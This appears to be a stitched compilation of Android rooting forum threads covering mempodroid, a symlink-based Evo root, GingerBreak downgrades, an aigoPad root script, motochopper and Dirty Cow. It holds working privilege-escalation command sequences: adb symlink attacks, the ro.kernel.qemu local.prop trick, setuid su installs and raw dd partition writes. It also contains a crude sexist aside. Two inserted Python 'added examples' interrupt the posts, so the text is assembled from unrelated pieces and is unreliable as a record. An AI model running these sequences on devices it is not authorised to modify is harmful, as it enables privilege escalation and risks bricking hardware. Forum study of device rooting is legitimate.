[HOWTO] Get offsets for ICS exploit - Android Software/Hacking General [Developers Only]

Saurik's mempodroid exploit needs the offsets of the "exit" and "setresuid" function calls in order to work.
Here's a tool that may find these two offsets while running on your ICS device and give you the mempodroid command line to run for gaining a temporary root shell.
This tool doesn't add any capability to Saurik's exploit.
Please let me know if you have any idea for improvement.
Feel free to use this tool, at your own risk.
1- download and unzip
2- push the two binaries to /data/local/tmp with adb
3- chmod 755
4- run n95-offsets
5- copy / paste the command line given by the tool
If the trick works, you will see the $ prompt change to a # one.
Hope it will help.

Hi,
It doesn't work on HTC One X with 4.0.3.
cheers
starbase64

Already too old
Hi,
The Mempodipper / mempodroid exploit uses a serious security hole in Linux kernels 2.6.39 and higher, which made some noise in the Linux world. A patch was given by Linus Torvalds himself in late January.
It always takes some time to deploy patched kernels, but by now most of them are probably mempodroid-resistant.
Wait for the next...

I just updated my samsung galaxy nexus from 4.0.2 to 4.0.4. Before that, I could root it using the command line provided by saurik:
Galaxy Nexus 4.0.2: 0xd7f4 0xad4b
source: https://github.com/saurik/mempodroid
After the update, I did not manage to root it so I came to this topic after some research on xda
Unfortunately, it looks the 4.0.4 update patches this hole on the galaxy nexus (or the n95-offsets tool does not work, which is probably not the case). Here for the record is what is returned by the tool:
[email protected]:/data/local/tmp $ ./n95-offsets
n95-offsets by Nesquick95
Gets requiered offsets for mempodroid exploit
./mempodroid 0xd7cc 0xad27 sh
1|[email protected]:/data/local/tmp $ ./mempodroid 0xd7cc 0xad27 sh
1|[email protected]:/data/local/tmp $
No root shell given. Any proof of the vulnerability being patched with 4.0.3 or 4.0.4?

No proof but...
Hi,
I've also lost mempodroid rooting capacity when upgrading my Galaxy Nexus from 4.0.2 to 4.0.4.
The tool can be wrong but I mainly think that the hole has been patched. But you're right, no proof of it until now

Nesquick95 said:
Hi,
I've also lost mempodroid rooting capacity when upgrading my Galaxy Nexus from 4.0.2 to 4.0.4.
The tool can be wrong but I mainly think that the hole has been patched. But you're right, no proof of it until now
Yes, I think that too. How did you manage to get 4.0.4 rooted then? Did you unlock the bootloader or did you use another root exploit?

Unlocked
I've rooted 4.0.4 by unlocking the bootloader, flashing ClockworkMod recovery, then an update.zip containing only the su binary.
I'd have preferred keeping the stock bootloader locked, but there are not so many kernel exploits around here for now, and I ain't got time for testing other devices' (Acer, Sony, ...) specific exploits on the Gnex...
If you're interested, you can take a look at Dan Rosenberg's work, in addition to all the great things already done here at XDA:
http://vulnfactory.org/blog/

Nesquick95 said:
Saurik's mempodroid exploit needs offsets of "exit" and "setresuid" functions calls in order to work.
Here's a tool that may find this two offsets while running on your ICS device and give you the mempodroid command line to run for gaining a temporary root shell.
This tool doesn't add any capability to Saurik's exploit.
Please let me know if you have any idea for improvement.
Feel free to use this tool, at your own risks.
1- download and unzip
2- push the two binaries to /data/local/tmp with adb
3- chmod 755
4- run n95-offsets
5- copy / paste the command line given by the tool
If the trick works, you will see the $ prompt change to a # one.
Hope it will help.
Hi Nesquick. I need to compile this source and mempodroid for a MIPS tablet (4.0.3 ICS and 3.0.8 kernel), since it seems that it cannot be rooted. Can't adb root or su. Do you think it could be used, or could you help generate the binaries for MIPS?
Thanks in advance

Hi,
Hard to say if it will work or not... Your 3.0.8 kernel may be a good candidate as long as it hasn't been mempodroid-patched by the tablet's provider.
I have Google NDK r7 installed; it offers only x86 and ARM support. It seems that MIPS support comes with r8:
http://developer.android.com/sdk/ndk/index.html
You'll find the perl script used to compile my C programs attached (thanks to the author, Andrew Ross). I think it won't be too hard to adapt it to the NDK r8 / MIPS platform...

The offset of "exit" is wrong
Nesquick95 said:
Saurik's mempodroid exploit needs offsets of "exit" and "setresuid" functions calls in order to work.
Here's a tool that may find this two offsets while running on your ICS device and give you the mempodroid command line to run for gaining a temporary root shell.
This tool doesn't add any capability to Saurik's exploit.
Please let me know if you have any idea for improvement.
Feel free to use this tool, at your own risks.
1- download and unzip
2- push the two binaries to /data/local/tmp with adb
3- chmod 755
4- run n95-offsets
5- copy / paste the command line given by the tool
If the trick works, you will see the $ prompt change to a # one.
Hope it will help.
this is ok, great!!!

n95-offsets can work
olive360 said:
Hi, I got the offsets with n95-offsets.
The offset of "exit" is wrong,
the offset of "setresuid" is right.
My cell's offsets are 0xd524 0xab8f;
the offsets obtained with n95-offsets are 0x8003 0xab8f.
Sorry, I made a mistake: n95-offsets can work, I have rooted using it.

Thanks!!! It works with my Yifang / Mediacom MD 860 S2 (Generic ICS 4.0.4 tablet on a Cortex A9 platform)

Hi, I've got a Mediacom 715i (new one with 4.0.4). I've used n95-offsets to find the two offsets, then I've executed mempodroid, but it doesn't work. I still have the '$' prompt. Any idea?


The easiest 1.47.651.1 root+nand unlock you'll ever see without a gui (Updated)

Make sure your battery has a decent amount of charge in it, you don't want to run out of juice in the middle of this.
You will need to have the android sdk installed, as you will need to use the adb tool.
Windows users will need to install HTC Sync in order to get the usb driver for the phone installed.
Part 1: In which we find that the Evo spreads easier than a Thai whore during tourist season
Code:
adb shell "rm /data/local/rights/mid.txt"
adb shell "ln -s /dev/mtd/mtd1 /data/local/rights/mid.txt"
adb reboot
Part 2: In which we find that engineers have no personality, but they make one hell of a bootloader
Put the files from Toast's Part 2, for nand unlock onto the sdcard (PC36IMG.zip, mtd-eng.img, recovery.img, flash_image)
then (after making sure the sdcard is remounted to the phone if you used disk mode to xfer the files):
Code:
adb shell "cat /sdcard/flash_image > /data/local/rights/flash_image"
adb shell "chmod 755 /data/local/rights/flash_image"
adb shell "/data/local/rights/flash_image misc /sdcard/mtd-eng.img"
adb reboot bootloader
When asked if you want to update, say yes. Relax for a while, the update takes some time.
When the phone eventually boots back up:
Part 3: In which I find the whore, and make her install a custom recovery
Code:
adb shell "cat /sdcard/flash_image > /data/flash_image"
adb shell "chmod 755 /data/flash_image"
adb shell "/data/flash_image recovery /sdcard/recovery.img"
After this you should be fully rooted with nand unlock.
I highly recommend going through Whitslack's Starting Over method to bring your software and radios up to date.
You're done.
Pity this only came to light a few days before people are going to be upgrading to a new OTA.
No, this will not work for anyone who updated to 2.2.
epic!!! 789
niice!
Nice Find!
At least now people can be rooted prior to the new OTA!
damn it!
___
Sweet! Wish I had that method starting out. Lol.
Sent from my PC36100 using XDA App
does this method really work??
BAttitude7689 said:
does this method really work??
Yes it does.
ok, so i have no idea how that works... care to go into it alittle bit more?
khshapiro said:
ok, so i have no idea how that works... care to go into it alittle bit more?
The init scripts chmod 777 mid.txt on boot (this means that anyone can do anything to the file basically). By removing the file and linking it to mtd1, the chmod now makes mtd1 accessible by everyone after a reboot, which means that you can go directly to toast's part2 which starts with flashing mtd-eng.img.
Incidentally it appears the droid eris guys have been using this flaw to their advantage for a while as well ;D.
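An added example (not from netarchy's post) showing in Python why a boot-time chmod on a path under a user-writable directory is unsafe: chmod(2) follows symlinks, so the mode lands on whatever the path points at. The hardened variant (safe_chmod, an assumed name) opens with O_NOFOLLOW and applies the mode through the descriptor; "mtd1" and "mid.txt" are constructed stand-ins in a temp directory.

```python
import errno
import os
import stat
import tempfile


def naive_chmod(path, mode):
    """What an init script's 'chmod 777 mid.txt' does: chmod(2) follows symlinks,
    so if 'path' has been replaced by a link, the mode lands on the link target."""
    os.chmod(path, mode)


def safe_chmod(path, mode):
    """Hardened variant (assumed name): open with O_NOFOLLOW so a symlink at the
    final component makes open() fail with ELOOP instead of being followed, then
    apply the mode through the descriptor we actually opened (no TOCTOU window
    between a check and the chmod)."""
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    except OSError as exc:
        if exc.errno == errno.ELOOP:
            raise PermissionError(f"{path}: is a symlink, refusing to chmod") from exc
        raise
    try:
        if not stat.S_ISREG(os.fstat(fd).st_mode):
            raise PermissionError(f"{path}: not a regular file, refusing to chmod")
        os.fchmod(fd, mode)
    finally:
        os.close(fd)


def mode_of(path):
    return stat.S_IMODE(os.stat(path).st_mode)


def demo():
    """Constructed scenario in a temp dir: 'mtd1' stands in for the flash device
    node (a regular file here), 'mid.txt' for the file the init script chmods.
    Returns (mode after naive chmod via the link, whether safe_chmod refused the
    link, target mode after the refused attempt, mode after safe_chmod on the
    real file)."""
    d = tempfile.mkdtemp()
    target = os.path.join(d, "mtd1")
    with open(target, "w"):
        pass
    os.chmod(target, 0o600)
    link = os.path.join(d, "mid.txt")
    os.symlink(target, link)          # the replacement the post describes

    naive_chmod(link, 0o777)
    after_naive = mode_of(target)     # 0o777: the "device node" is now world-writable

    os.chmod(target, 0o600)
    try:
        safe_chmod(link, 0o777)
        refused = False
    except PermissionError:
        refused = True
    after_safe = mode_of(target)      # still 0o600, the link was not followed

    safe_chmod(target, 0o777)         # legitimate use on the real file still works
    return after_naive, refused, after_safe, mode_of(target)


if __name__ == "__main__":
    print(demo())
```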
So no, really? What is "root?"
You do fine work, sir
posting in a legendary thread
Couldn't you then just use wits "start over" method for part two to make the process even shorter?
netarchy said:
Part 1:
Code:
adb shell rm /data/local/rights/mid.txt
adb shell ln -s /dev/mtd/mtd1 /data/local/rights/mid.txt
adb reboot
What would be more interesting is for someone on the new OTA non-root to see if this exists in the Froyo release. I'll look around for a posting of the OTA update non-rooted and try it on my smashed phone. At least I won't care if that thing loses root.
Could we get a "The easiest 1.47.651.1 root method with nand unlock" for dummies? I have no clue what to do with this code.
You need to use an ADB shell for this using the Android SDK....
I tried to use the Evo-Recovery shell and received permission denied errors.
I am not a DEV by any means, and do not claim any credit for any of this. However, for people who need help, this may offer some assistance -- this is definitely the easiest root method out there.
1. Download and Install Android SDK - Learn Here
http://forum.xda-developers.com/showthread.php?t=694250
2. Open up a Command Prompt by holding windows button & pressing R or by pressing Run and typing CMD.
3. Navigate your way in DOS to the Android SDK folder, then to the Tools Folder
4. Then enter in the code in part 1. After each line press enter...the line will repeat below it.
5. Follow Toasts Part 2 -- Link: http://forum.xda-developers.com/showthread.php?t=701835 -- Video found here: http://www.youtube.com/watch?v=tUXTB0eydwE.
5A. Because you didn't do Toast's Part 1 of Root first (you used an exploit provided by the OP), you will NOT have a NAND Backup. Put the Custom ROM you want to load on your SD card, and after unlocking NAND protection and doing the wipes, load it from the custom recovery in lieu of restoring your NAND backup.
6. You're now rooted w/ NAND Unlocked!
7. I would then suggest going here, and running this so you have a fully rooted, stock ROM with all your radio/wimax up to date: http://forum.xda-developers.com/showthread.php?t=715915.
Anyone know if this method will work on an unrevoked3'd Evo? I am trying to acquire full root and I was going to use SimpleRoot today but if this will work...
Thank you for this! Question about part 7. You suggest running the fully rooted stock 1.47.651.1 afterwards. Would it be a bad idea to just run the fully rooted stock Froyo 3.23.651.3, or even any other custom ROM for that matter? i.e. OMJ's EVO 2.2 custom ROM? Thanks
regulator207 said:
Couldn't you then just use wits "start over" method for part two to make the process even shorter?
No because you need the engineering hboot to flash it since it's not signed by HTC.
Should work on 1.32 or 1.47. Nice.
Someone should test if this still works in the new 2.2 update. Good chance it does.
damn it!
justinisyoung said:
damn it!
___
Hey! That's what I was gonna say!

How to DOWNGRADE Desire S with S-ON

Warning! I don't recommend this to users who are new to Android since there is a possibility of bricking your device. I will not be responsible if this happens.
It will downgrade everything even the HBoot using a HTC signed ROM. I've downgraded RUU_Saga_Telstra_WWE_1.36.841.3 with HBoot 0.98.0002 to Hboot 0.98.0000 of RUU_Saga_HTC_Thailand_1.35.1113.2.
First you need below tools and applications. I will not explain everything since I'm assuming you already know how to use it and make it.
1. ADB tool to access your device through the shell.
2. ADB driver - you may install HTC Sync since it has the ADB driver in it.
3. HEX editor - I used HxD.
4. Spare micro SD with Goldcard.
5. Card reader to make your life easier.
6. Update.zip ROM you will use to downgrade (rename it to PG88IMG.zip).
7. GingerBreak-v1.20.apk to temp root our device.
Step 1: Copy GingerBreak-v1.20.apk to your spare micro SD and insert it into your phone.
Step 2: Enable USB debugging in your device and connect it to your PC(Charge only). Make sure the drivers are installed properly. If not, install HTC Sync.
Step 3: Install and run GingerBreak-v1.20.apk. It will force close other apps (this is normal, just close it). The GingerBreak application will prompt that something went wrong with the rooting (can't remember the actual spiel), but actually we already have our temp root.
Step 4: Run your ADB tool and issue the command su to have root access. You can now see on your device that the Superuser app is prompting you to allow ADB root access. Accept it.
Step 5: On the # prompt, issue the command dd if=/dev/block/mmcblk0p17 of=/mnt/sdcard/mmcblk0p17.img (to copy mmcblk0p17 to your SD card). Power off your device and copy mmcblk0p17.img to your PC. (You can also use the command shell to copy it to your PC if you know how to do it.)
Step 6: Open mmcblk0p17.img using your hex editor. On the 11th line (I think), modify the current version to 1.28.401.1 (since this is the lowest version I know). Save it and copy it back to the SD card. Insert the SD card and turn your phone on.
Step 7: Run GingerBreak-v1.20.apk again and follow steps 3 to 4.
Step 8: On the # prompt, issue the command dd if=/mnt/sdcard/mmcblk0p17.img of=/dev/block/mmcblk0p17 (to copy mmcblk0p17.img back to your phone). Do this as quickly as possible since the temp root access sometimes loses its effect.
Step 9: Power off your device and remove your SDcard. Using your card reader, delete everything(not format) in your microSD(with Goldcard) and paste your PG88IMG.zip.
Step 10: Hold volume down + power to boot to recovery and the phone will do the installation itself. Wait until you have your downgraded ROM.
This is how I do it. Hope you won't encounter any problem with this procedure. Good luck!
I want to give thanks to all the XDA members for the knowledge I acquired for this procedure and to the developer of Gingerbreak.
You may also check sonikz procedure on post #4. I think his procedure is faster. You may use which one is easier for you to follow.
Downgrade to what? To Froyo?
And for what reason?
Sorry for that noob question...
panosfx said:
Downgrade to what? To Froyo?
And for what reason?
Sorry for that noob question...
Good question, I think. If I remember well, on the Desire (or HD?) sometimes downgrading was a way of getting to a version of software where you could then get root again! From that point on you could get a recovery installed and install some nice ROMs. I don't know if that's what's going on here; I wouldn't dare to hope that...?
Me n00b me downgrade
Newrad67, I have compiled a n00b way to achieve very similar results:
First off you need to create a Gold Card
Use the memory card that came with the phone, may as well hey!
Install Goldcard helper from market, run it and copy the CID for MMC2
This number has already been reversed so go to here, fill out the required fields.
That will then email you an image file. You can then using Gold Card Tool flash your image file to your phones SD card via the phones USB cable.
Next for the actual downgrade
You'll need this unzipped
in a command prompt, goto the directory you unzipped to
connect the phone via USB
then:
adb push misc_version /data/local/tmp
adb push GingerBreak /data/local/tmp
adb shell chmod 777 /data/local/tmp/misc_version
adb shell chmod 777 /data/local/tmp/GingerBreak
This copies the files to the phone and changes the permissions so they will function
adb shell
This will enter the terminal for the phone
./data/local/tmp/GingerBreak
This will then temp root the phone. You should now have # at the terminal prompt instead of $, which means you have higher privileges.
From this point you can then run misc_version (thanks to Blezz for the version number). This changes the version reported by the phone to 1.27.405.6; you cannot check this on the phone though, as it will still report the other number.
cd /data/local/tmp
./misc_version -s 1.27.405.6
From here you can then install the update/downgrade from the exe, no need to dump zip files or anything. As with anything here, results may vary and I won't be buying new hardware if it breaks yours! But it works a treat on mine.
This can be used with paulobriens test signed RUU HTC update to get root/boot/recovery installed on s-on .
If it just were public
Sent from my HTC Desire S using XDA Premium App
panosfx said:
Downgrade to what? To Froyo?
And for what reason?
Sorry for that noob question...
This is why I recommend this only to advanced users.
Our Desire S with S-On was released with a Gingerbread ROM and an HBoot on which it is still not possible (as of now) to have a custom boot recovery. Since we are on S-On, it is still not possible to be rooted and use a custom ROM.
As far as I know, we don't have any official ROM except for Gingerbread. Correct me if I'm wrong. The list can be seen in this post: http://forum.xda-developers.com/showthread.php?t=1002506
I'm just sharing this for people who want to change their ROM to a different one. Like me, who installed the latest ROM from TELSTRA and found the bloatware annoying. I've done this to get back to the ROM I'm more comfortable using.
Yeah I'm pretty much with you mate, no way to do anything more practical than flash a clean European Rom currently..... Not really a vast amount of progress either. Anything we should be doing to help get permanent root? Anyone?
Sent from my HTC Desire S using XDA App
Thankkssssss
It works on my s-on DS
Thanks a lot
I really like how sonikz is acting now like it was his idea to downgrade using adb, GingerBreak and misc_version, lol.
I'm gonna stop my rooting tries + supporting here for the Desire S, hating such people like him.
I never said it was my idea and I have in a posted my thanks to the relevant people in other threads, I didn't mean to rub anyone the wrong way... I hadn't seen a adb version of gingerbreak until Friday and I'm sure you know the apk is very unpredictable or at least it is on my phone so I couldn't use misc_version, it just kept kicking errors.... Hey I just threw it out there, my bad
okay
No, it isn't the apk's fault; maybe you forgot to use "su" in adb shell after using the apk, which you don't need for the command line version.
Anyway, maybe there is a way to get past the S-OFF.
In Titanium Backup there's a recovery exploit to remove files from S-ON phones.
We just need to know how the exploit is working and if it is still working with 2.3.
2nd option: I am getting a 2nd Desire S soon. It's a bugged one, radio destroyed, and he doesn't get it replaced so he gives it to me.
Maybe I can get the Desire HD bootloader running somehow, even if I am sure it will be a lot of work to get in.
Plz guys... Get a grip.. we share.. whocares about credit.. come on..
Keep sharing.
Sent from my HTC Desire S using XDA Premium App
Worked
Sent from my HTC Desire S using XDA Premium App
@Rexton270: what worked?
@brokenworm: what did you mean by the paulobriens test RUU?
@brokenworm:
It's not Paul's RUU; the files he published were released 1 day before on 911sniper's blog,
sadly without ruu too
what ROM to get root
after doing that, what ROM is it better to download in order to become root ?
thanks
pdaGeek13 said:
after doing that, what ROM is it better to download in order to become root ?
thanks
If you are on S-ON, none as of now.
Sent from my HTC Desire S using XDA Premium App
> 2 hours
running for more than 2 hours now, normal ?
sonikz said:
Newrad67, I have compiled a n00b way to achieve very similar results:
First off you need to create a Gold Card
Use the memory card that came with the phone, may as well hey!
Install Goldcard helper from market, run it and copy the CID for MMC2
This number has already been reversed so go to here, fill out the required fields.
That will then email you an image file. You can then using Gold Card Tool flash your image file to your phones SD card via the phones USB cable.
Next for the actual downgrade
You'll need this unzipped
in a command prompt, goto the directory you unzipped to
connect the phone via USB
then:
This copies the files to the phone and changes the permissions so they will function
This will enter the terminal for the phone
This will then temp root the phone you should now have # at the terminal prompt instead of $, which means you have higher privileges
From this point you can then run misc_version (Thanks to Blezz for the version number) This changes the version reported by the phone to 1.27.405.6, you cannot check this on the phone tho, as it will still report the other number.
From here you can then install the update/downgrade from the exe, no need to dump zip files or anything. As with anything here, results may vary and I won't be buying new hardware if it breaks yours! But it works a treat on mine.
No, not normal. Restart your phone and try again.
Because it's S-ON nothing can happen to your system, so don't worry and just restart.
Blezz said:
No, not normal. Restart your phone and try again.
Because it's S-ON nothing can happen to your system, so don't worry and just restart.
same thing with this log:
$ ./GingerBreak
./GingerBreak
[**] Gingerbreak/Honeybomb -- android 2.[2,3], 3.0 s
[**] (C) 2010-2011 The Android Exploid Crew. All rig
[**] Kudos to jenzi, the #brownpants-party, the Open
[**] Zynamics for ARM skills and Onkel Budi
[**] donate to [email protected] if you like
[**] Exploit may take a while!
[+] Plain Gingerbread mode!
[+] Found system: 0xafd17fd5 strcmp: 0xafd38065
[+] Found PT_DYNAMIC of size 232 (29 entries)
[+] Found GOT: 0x00014360
[+] Using device /devices/platform/goldfish_mmc.0
[*] vold: 25104 GOT start: 0x00014360 GOT end: 0x000
[*] vold: 25104 idx: -1024 fault addr: 0xfffb2284
[*] vold: 25162 idx: -2048 fault addr: 0xfff4e284
[*] vold: 25212 idx: -3072 fault addr: 0xffeea284
[*] vold: 25262 idx: -4096 fault addr: 0xffe86284
[*] vold: 25312 idx: -5120 fault addr: 0xffe22284
[*] vold: 25363 idx: -6144 fault addr: 0xffdbe284
[*] vold: 25414 idx: -7168 fault addr: 0xffd5a284
[*] vold: 25466 idx: -8192 fault addr: 0xffcf6284
etc ....
and sometimes:
[+] fault address in range (0x000132b4,idx=-3072)
[+] Calculated idx: -2005
[-] sendmsg() failed?
[-] sendmsg() failed?
[-] sendmsg() failed?
:-(

[Q] How to root AigoPad M60

Can someone help me root the aigopad m60? I'm already searching all over the net...
Thanks.
kickhopperX said:
Can someone help me root the aigopad m60? I'm already searching all over the net...
Thanks.
There are two apps aimed at rooting Android devices: 'z4root' and 'superoneclick' but success with these is hit or miss. It's worth a shot
Sent from my SCH-R880 using xda app-developers app
kickhopperX said:
Can someone help me root the aigopad m60? I'm already searching all over the net...
Thanks.
Hello kickhopperX
I also have an aigopad m60 tablet like you. This tablet is already rooted; you just need one application such as ES Explorer, which will allow you access to the tree (/).
I needed some time to mount my external SD card into the system.
One question: does your tablet restart all the time?
Good day
Excuse me if I speak a little poorly; I use Google Translate to translate.
aigoPad m60
fariik said:
Hello kickhopperX
I also have an aigopad m60 tablet like you. This tablet is already rooted; you just need one application such as ES Explorer, which will allow you access to the tree (/).
I needed some time to mount my external SD card into the system.
One question: does your tablet restart all the time?
Good day
Excuse me if I speak a little poorly; I use Google Translate to translate.
Do you mean that it's already rooted?
Have you tried Directory Bind or SwapSD?
I already tried z4root & SuperOneClick to root this device; both options won't work. Please help us.
I already found the solution guys!
Search 4Shared for this app:
DamNxQQr/doomlord_v1_xperia-2011-ics-ro
Hoho.. thanks dude.. it's working!!..
Well... got a custom ROM for this tablet?..
It's working? How did you do it?
kickhopperX said:
Hoho.. thanks dude.. it's working!!..
Well... got a custom ROM for this tablet?..
Not working with my aigopad m60, need help here because I don't know where to start.
I already have DamNxQQr/doomlord_v1_xperia-2011-ics-ro downloaded to my PC and I have not installed anything yet on the aigopad m60.
I followed the instructions in runme (Windows batch file) and when I run the batch it says "adb server is out of date" and "more than 1 device and emulator", then it says "complete
YAY!!!!!" and nothing happens.
arerain86 said:
I already found the solution guys!
Search 4Shared for this app:
DamNxQQr/doomlord_v1_xperia-2011-ics-ro
I'm trying on my AigoPad M60, but not working
Here's how I did it.
Download and install Moborobo. Launch the app and let it download the driver for the m60.
Once it stabilizes, unplug your tablet and reboot. On your desktop exit Moborobo and kill the process. Reconnect the tablet and execute runme.bat.
Let me know.
Thanks
[ROOT] [HOWTO] aigoPad M60 rooting script + generic su + generic usb driver
Hi.
I own several aigoPad M60s bought from all over (that is to say, they have slightly different ICS 4.0.3 revisions), and some I actually got with different revisions by sending them to the service centre and having them flashed to a newer firmware.
Nevertheless, all of them can be rooted using this script (for Windows, 380 KB).
I actually rooted a Kindle Fire HD first using this script, found on some Chinese site (sorry, I already forgot where, so please pardon me for the lack of credits). I cleaned up and anglicised the whole thing, and updated the ADB tools to a greater (and more compatible) version. Actually most ICS root scripts found everywhere are more or less the same.
So far, devices tested and succeeded:
- Amazon Kindle Fire HD (ICS version)
- aigoPad M60 (ICS)
- Samsung Galaxy SII (GT-I9100 & GT-I9100G) ICS and Jellybean (works on mine, both phones and both 4.0.3 and 4.1.2)
- Chinese Samsung Galaxy SIII clone (can't explain much since it's a bootleg, it has MTK board) (ICS)
- Several other Chinese tablets which somehow lost their root or were not rooted (ICS): Momo.cn 3G, AMPE, MaPaN. Sorry, I don't remember their exact models anymore.
This script contains a batch file, ADB exe file and two API libraries, and a generic su found in chinese tablets. The su works up to certain level but it is preferred to replace that with SuperSU from chainfire (Superuser from chainsdd didn't work well on these ICS chinese tablets, for me. Not sure about koushik's). Just install and when it asks to replace binary, choose normal and tap yes.
You have to have installed USB driver first. I have uploaded the compatible USB ADB driver for most chinese phones and tablets (8.5 MB, have to be split into x32 and x64 since the forum doesn't allow 8MB+ attachments, if you're not sure, download both and merge the folders, overwriting duplicate files).
Note: The driver works on Windows XP, 7 and 8. On Win 7 and 8 you will have to disable driver signature verify in order to install. (Win 7: Boot, F8, Disable signature. Win 8: Setting, Change PC Settings, General, Advanced Startup, look for Disable signature)
Those who already have ADB and drivers installed, here it is (simplified form of the actual script):
Windows (no need admin for ADB, just for driver installation):
Code:
adb wait-for-device
adb shell mv /data/local/tmp /data/local/tmp.bak
adb shell ln -s /data /data/local/tmp
adb reboot
adb wait-for-device
adb shell rm /data/local.prop
adb shell "echo \"ro.kernel.qemu=1\" > /data/local.prop"
adb reboot
adb wait-for-device
adb remount
adb push su /system/xbin/su
adb shell chown 0.0 /system/xbin/su
adb shell chmod 06755 /system/xbin/su
adb shell rm /data/local.prop
adb shell rm /data/local/tmp
adb shell mv /data/local/tmp.bak /data/local/tmp
adb reboot
adb kill-server
Linux:
Same
Tip: If you want to, you don't have to download anything. Just copy+paste the script. But make sure you have su in current directory. You can get chainfire's su from SuperSU.apk (assets\supersu.arm.png, rename it to su).
Careful though, this copy+paste script lacks safety measures compared to the one in the archive, such as it doesn't check if the rooting is a success or not, but the script inside archive will prompt you first before wiping /data/local/tmp ...
Note: What I mean by the su works 'up to certain level' is, it doesn't accept command lines such as su -c command. Also you will have to replace it with a proper superuser app (SuperSU, Superuser) if you want to use Titanium Backup, Lucky Patcher and so on...
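As an added example (not part of the script or archive above), a Python audit that checks a device tree for the footprints this style of rooting leaves behind: ro.kernel.qemu=1 in data/local.prop, data/local/tmp replaced by a symlink, and a setuid su in system/xbin. It runs over a constructed fake root in a temp directory; paths are relative to the supplied root so it can be pointed at a pulled copy of /data and /system.

```python
import os
import stat
import tempfile


def parse_props(text):
    """Parse Android *.prop style 'key=value' lines; quotes around values are
    stripped because the copy+paste script echoes the value inside \"...\"."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        props[key.strip()] = value.strip().strip('"')
    return props


def audit_root_footprints(root):
    """Return a list of findings describing the artifacts the rooting script
    leaves. 'root' is a directory laid out like the device filesystem."""
    findings = []

    local_prop = os.path.join(root, "data", "local.prop")
    if os.path.isfile(local_prop):
        with open(local_prop, encoding="utf-8", errors="replace") as fh:
            props = parse_props(fh.read())
        if props.get("ro.kernel.qemu") == "1":
            findings.append("data/local.prop sets ro.kernel.qemu=1: adbd will start as root")

    tmp = os.path.join(root, "data", "local", "tmp")
    if os.path.islink(tmp):
        findings.append("data/local/tmp is a symlink to %s" % os.readlink(tmp))

    su = os.path.join(root, "system", "xbin", "su")
    if os.path.isfile(su):
        mode = os.stat(su).st_mode
        if mode & stat.S_ISUID:
            findings.append("system/xbin/su is setuid (mode %o)" % stat.S_IMODE(mode))
    return findings


def build_fake_root(rooted):
    """Constructed sample tree: either a clean layout or one carrying the three
    artifacts the script creates (local.prop, symlinked tmp, setuid su)."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "data", "local"))
    os.makedirs(os.path.join(root, "system", "xbin"))
    if rooted:
        with open(os.path.join(root, "data", "local.prop"), "w") as fh:
            fh.write("ro.kernel.qemu=1\n")
        os.symlink(os.path.join(root, "data"), os.path.join(root, "data", "local", "tmp"))
        su = os.path.join(root, "system", "xbin", "su")
        with open(su, "wb") as fh:
            fh.write(b"\x7fELF")          # placeholder bytes, not a real binary
        os.chmod(su, 0o6755)             # same mode the script applies
    else:
        os.makedirs(os.path.join(root, "data", "local", "tmp"))
    return root


if __name__ == "__main__":
    for finding in audit_root_footprints(build_fake_root(True)):
        print(finding)
```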
I just purchased one for my kids to play games, and I googled how to root the aigopad m60; it took me here.
Many thanks for the guide, I successfully rooted it.

Temporary root via motochopper

Hi, I was experimenting with rooting without registering at HTCDev, testing many Linux kernel exploits. (I don't write the exploits myself; I compile exploit source code and try to make it run on the One SV kernel.)
The exploit I found working is motochopper; with some minor modifications, it could also be used to gain temporary root on the One SV.
I tested this exploit on the Taiwanese version of the One SV, which is k2u with Android 4.1.2; the kernel version is "3.4.10-gb590306 [email protected] #1 SMP PREEMPT".
First download motochopper.zip from the link above, unzip it.
Code:
adb push pwn /data/local/tmp/
adb shell chmod 755 /data/local/tmp/pwn
adb push su /data/local/tmp/
adb push busybox /data/local/tmp/
Now, adb shell into it and execute /data/local/tmp/pwn. This would push the su executable to /system/xbin; then "su -" and you should now be root!
But due to HTC's modified kernel, which has eMMC write protection, the /system partition is unwritable. Some time later you would find the su executable you pushed to /system/xbin disappears; this would also happen on reboots. This means you would need to re-run this exploit every time you reboot!
The motochopper exploit is based on CVE-2013-2596, which affects Linux kernels before 3.8.9 and some Android builds. Since the vulnerability comes from the Linux kernel, I predict it would also work on all versions of the One SV's 3.4.10 kernel, perhaps even all HTC 3.4.10 kernels.
With temporary root, you can read & write memory (dump the kernel image), dump any partition (but some of them are read-only, as mentioned above), etc.
I'm still thinking about how to get permanent root from this point; post here if you have any ideas!
ps. I have fewer than 10 posts so I can't post to the development boards. But this post should go there, I guess.
Did someone try on the LTE version ?
Does it work?
I would like to use that to remove a few stock apps, like Best Deals, Flickr for HTC Sense, FB for HTC Sense, etc...
But once it's over, before reboot, is it possible to delete the files ?
If you're on hboot 2.0 (if you updated to jb) you won't be able to remove anything, since the system partition is write protected. Apps'll come back after reboot.
On hboot 1 there's no problem though, afaik.

Dirty Cow

Just wondering if the new Dirty Cow exploit means all those previously unrootable phones can now (or very soon) be rooted.
http://www.cyberciti.biz/faq/dirtyc...local-privilege-escalation-vulnerability-fix/
kennonk said:
Just wondering if the new Dirty Cow exploit means all those previously unrootable phones can now (or very soon) be rooted.
http://www.cyberciti.biz/faq/dirtyc...local-privilege-escalation-vulnerability-fix/
Based upon the early research into this, YES, it would appear that this also has a widespread effect on the Android Linux kernel.
https://www.nowsecure.com/blog/2016/10/21/dirty-cow-vulnerability-mobile-impact/
https://www.theguardian.com/technol...ow-linux-vulnerability-found-after-nine-years
(Bottom of Article Google confirms Android is susceptible)
PoC Code which would probably need to be slightly refactored for use in Android, but still highly relevant
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
The bug affects the Android Linux kernel. I already tested it, and yes, you can change any file owned by root to whatever you want.
But that doesn't mean you can actually root the phone (that is, gain root access). Maybe it is possible, but I don't think it is trivial. The thing is: you can modify root-owned files, yes. But you need some process owned by root to execute your file, so you can gain root access. Editing init scripts won't work since they are recreated every time you boot your phone, and after the phone boots, as far as I know, nothing else is executed by root.
I don't mean that it can't be done, maybe there's some file that is executed by root after boot out there that you can modify, but I wouldn't know which one.
Scorpius666 said:
The thing is: you can modify root owned files, yes. But you need that some process owned by root executes your file, so you can gain root access.
Doesn't that mean you can install a custom su binary and just execute that as any user?
